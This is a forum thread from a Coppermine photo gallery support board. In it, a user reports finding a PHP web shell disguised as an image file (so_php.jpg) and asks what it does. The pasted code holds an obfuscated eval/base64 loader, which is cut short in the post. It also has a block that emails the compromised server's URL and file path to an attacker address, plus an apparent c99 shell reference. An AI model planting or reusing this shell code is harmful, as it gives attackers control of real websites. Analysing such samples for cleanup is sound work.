Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: gallery exploited - php shell?  (Read 4074 times)

0 Members and 1 Guest are viewing this topic.

toke

  • Coppermine newbie
  • Offline Offline
  • Posts: 1
gallery exploited - php shell?
« on: December 03, 2010, 10:05:27 am »

Hello,

today i was downloading a backup, and when i ziped it up with 7-zip my antvirus went off and i found this file was in /gallery/userpics/so_php.jpg

Code: [Select]
<?PHP
             //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = "d0929b176456727f564dc6281ad4d722"; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCB[...........to long, had to cut it out. ill upload txt file...................]2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));

<?
// sh3ll.us & no-shell.net
// shell4spam@gmail.com
// shell4spam@gmail.com
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
    $to = "fofo-303@hotmail.com";
    $subject = "EGFM";
    $header = "from: EGFM <fofo-303@hotmail.com>";
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $sentmail = @mail($to, $subject, $message, $header);
    
    echo "";
    exit;
}
?>
</body></html><?php chdir($lastdir); c99shexit(); ?>

i am about to upgrade to 1.5 however i would like to know what this code did.
Logged

Brooklyn

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 33
Logged
Pages: [1]   Go Up
 

Page created in 0.047 seconds with 19 queries.